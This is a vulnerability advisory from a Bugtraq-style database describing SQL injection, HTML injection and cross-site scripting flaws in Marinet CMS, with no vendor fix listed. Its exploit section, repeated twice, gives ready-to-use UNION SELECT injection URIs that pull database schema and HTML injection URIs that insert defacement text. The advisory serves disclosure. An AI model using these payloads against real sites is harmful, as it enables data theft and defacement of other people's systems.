Marinet CMS Multiple Input Validation Vulnerabilities
BID:40080
Info
Marinet CMS Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 40080 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 11 2010 12:00AM |
| Updated: | May 11 2010 12:00AM |
| Credit: | CoBRa_21 and Ashiyane Digital Security Team |
| Vulnerable: |
MARINET Marinet CMS 0 |
| Not Vulnerable: | |
Discussion
Marinet CMS Multiple Input Validation Vulnerabilities
Marinet CMS is prone to multiple input-validation vulnerabilities, including multiple SQL-injection, HTML-injection, and cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Marinet CMS is prone to multiple input-validation vulnerabilities, including multiple SQL-injection, HTML-injection, and cross-site scripting issues. The vulnerabilities occur because the application fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Marinet CMS Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.
The following example URIs are available:
http://www.example.com/product.php?id=-1%20union%20select%200,1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat%28column_name%29,23,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
http://www.example.com/productuk.php?id=-1%20union%20select%200,1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat%28column_name%29,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
http://www.example.com/galleryphoto.php?id=1&photo=<font size=15 color=red>Hacked By CoBRa_21</font>
http://www.example.com/info.php?catid=1&cat=<font size=15 color=red>Hacked By CoBRa_21</font>
Attackers can exploit these issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user into following a malicious URI.
The following example URIs are available:
http://www.example.com/product.php?id=-1%20union%20select%200,1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,group_concat%28column_name%29,23,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
http://www.example.com/productuk.php?id=-1%20union%20select%200,1,2,version%28%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,group_concat%28column_name%29,24,25,26%20from%20information_schema.columns%20where%20table_name=char%28118,%20105,%20115,%2097,%2095,%20116,%2097,%2098,%20108,%20101%29
http://www.example.com/galleryphoto.php?id=1&photo=<font size=15 color=red>Hacked By CoBRa_21</font>
http://www.example.com/info.php?catid=1&cat=<font size=15 color=red>Hacked By CoBRa_21</font>
Solution / Fix
Marinet CMS Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of any more recent information, please mail us at: [email protected].